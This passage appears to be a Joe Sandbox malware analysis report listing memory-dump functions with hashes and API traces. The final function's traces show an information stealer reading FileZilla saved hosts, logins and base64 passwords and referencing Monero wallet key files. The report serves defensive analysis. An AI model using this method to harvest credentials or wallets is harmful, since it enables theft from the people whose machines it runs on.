                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a6b02febdd4725413dc6051c37d35344316cacb27c1bf8cdb4779629496749e7
                              • Instruction ID: 75fbe61812c0521df11f7d90a8b48ad2fd8c5b485a430cc6bf5345135ae577d7
                              • Opcode Fuzzy Hash: a6b02febdd4725413dc6051c37d35344316cacb27c1bf8cdb4779629496749e7
                              • Instruction Fuzzy Hash: 56118B3188411DDBDB14EB60DC559DD7378BF20301F9043A9A92A5B092EF30274EC792
                              Function 003B1B44 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'J^k
                              • API String ID: 0-2683603079
                              • Opcode ID: 2261ad9ccdbd36daea528ae9b1af70624d92d8a4666fe73eba6a75951604736b
                              • Instruction ID: 1b92937612049cbd8ecc54a7fb12a5e5c2398941b5d295a8a7084a6970e8fa21
                              • Opcode Fuzzy Hash: 2261ad9ccdbd36daea528ae9b1af70624d92d8a4666fe73eba6a75951604736b
                              • Instruction Fuzzy Hash: 6E5126B3A081109FE7046A3CDD557AFB7A5EB94320F2B463DEAD5E3B40E53998018682
                              Function 003D6C2E Relevance: .2, Instructions: 191COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 11d9b45d2fadbfb0a90b420addd1a22ab86851f9a82b835b6027ee61dfbd21e5
                              • Instruction ID: aaf11a981c8fc4f95f6f2b59af752993ef46adfcfd8bc7e9c49fcccd2478656c
                              • Opcode Fuzzy Hash: 11d9b45d2fadbfb0a90b420addd1a22ab86851f9a82b835b6027ee61dfbd21e5
                              • Instruction Fuzzy Hash: 30512BF3E186159BE3046E3CDC5976AB791EF94310F1F4A3CE9C8D7784EA3949058682
                              Function 004FC2A1 Relevance: .2, Instructions: 172COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea8704e6b10542bfe6f12de5ad65899a7f9fa29c2ea8ab5a13edb24a9ba3f7d2
                              • Instruction ID: 299e214a13c42a2b8fee6fa662f10b77b1ffc7b3f126f6236fa17b5c35012beb
                              • Opcode Fuzzy Hash: ea8704e6b10542bfe6f12de5ad65899a7f9fa29c2ea8ab5a13edb24a9ba3f7d2
                              • Instruction Fuzzy Hash: 03517CF3E193045BE7086E3DEC4432ABBDADBD4220F6A463DEA8583384FD7958164183
                              Function 004A9E47 Relevance: .2, Instructions: 171COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04aa4a6fe8fbce4760b916471149a9f28e8717c03380db198b7ed4b01d32dd73
                              • Instruction ID: 42f723661385d400f7a36ee63a5016290d3c6c6fb04ba4507b139b6cb0b58c58
                              • Opcode Fuzzy Hash: 04aa4a6fe8fbce4760b916471149a9f28e8717c03380db198b7ed4b01d32dd73
                              • Instruction Fuzzy Hash: 53513BB3A093189BE314BD29DC4477AFBDADBC4331F26863DDA9493784E9351D048296
                              Function 0042A89F Relevance: .2, Instructions: 167COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a9a1edcb2d6d6915b5fe20c775c648059999880883e20c878b53d3ecb15b656
                              • Instruction ID: 7d95de664e876f162b65c79e6ab6f686d091a231c44a73cfb46807a45ef1401e
                              • Opcode Fuzzy Hash: 7a9a1edcb2d6d6915b5fe20c775c648059999880883e20c878b53d3ecb15b656
                              • Instruction Fuzzy Hash: 5D5149F3E096045FF7049E2DEC85726B7D6EB98721F2B863DE684C3385E97898008691
                              Function 00485BDE Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2d7d25c5e385227c29a4a81fdf7237ea163a43f36440d3628bdb9a115d5de6e8
                              • Instruction ID: 1c795a3fa7afdd2a26a65381e310af313c1c2c2d0161f7004f04698f21191f52
                              • Opcode Fuzzy Hash: 2d7d25c5e385227c29a4a81fdf7237ea163a43f36440d3628bdb9a115d5de6e8
                              • Instruction Fuzzy Hash: 4A4146F3E086145BF344293DDD4A766BA96EBC4720F2B823CDA98C37C4E87D89064145
                              Function 005853B7 Relevance: .2, Instructions: 152COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ef341c711dae1774e0346b03803a69f17abacf8a2f577a58edb13d0806498af
                              • Instruction ID: 2c8e83db4bdbd38d0be355aca8b2a9d16c730857b96dfa91b5a156190c8cabd5
                              • Opcode Fuzzy Hash: 7ef341c711dae1774e0346b03803a69f17abacf8a2f577a58edb13d0806498af
                              • Instruction Fuzzy Hash: 2B4124B390D900DBE700BA29ED0067ABBD6FBD4361F358D29ED82A3714F93059459783
                              Function 0059BB87 Relevance: .1, Instructions: 100COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f400c38fff111dd94d6e2cb82a072fb7e67f924a69b735a79501478da01891fb
                              • Instruction ID: 9d2438efcc2d83ec25e73af6f17625300531660689f604c09c1f1526127061fc
                              • Opcode Fuzzy Hash: f400c38fff111dd94d6e2cb82a072fb7e67f924a69b735a79501478da01891fb
                              • Instruction Fuzzy Hash: AF3127B240C7009FE30AAF29D89667AFBE4FF58710F56482DE7C682650E7755490CB8B
                              Function 0042FE13 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b39a6db6c995096f2daea0b09084dd3e608de3ba515994b2c7820cf4726fc5dd
                              • Instruction ID: 39f408a373a5230184c98468488240d7cd6c2fe46639a70f14bc923ade197edf
                              • Opcode Fuzzy Hash: b39a6db6c995096f2daea0b09084dd3e608de3ba515994b2c7820cf4726fc5dd
                              • Instruction Fuzzy Hash: 622147F3D483241BF348A969DC85376B1D5AB84310F2B843C8A88973C5FC6D5D0A41C5
                              Function 00159750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00150250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00160DBA,00160DB7,00160DB6,00160DB3), ref: 00150362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00150369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00150385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001503CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 001503DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00150419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00150463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 0015051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 0015054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00150562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00150571
                              • lstrcat.KERNEL32(?,url: ), ref: 00150580
                              • lstrcat.KERNEL32(?,00000000), ref: 00150593
                              • lstrcat.KERNEL32(?,00161678), ref: 001505A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001505B5
                              • lstrcat.KERNEL32(?,0016167C), ref: 001505C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001505D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001505E6
                              • lstrcat.KERNEL32(?,00161688), ref: 001505F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00150604
                              • lstrcat.KERNEL32(?,00000000), ref: 00150617
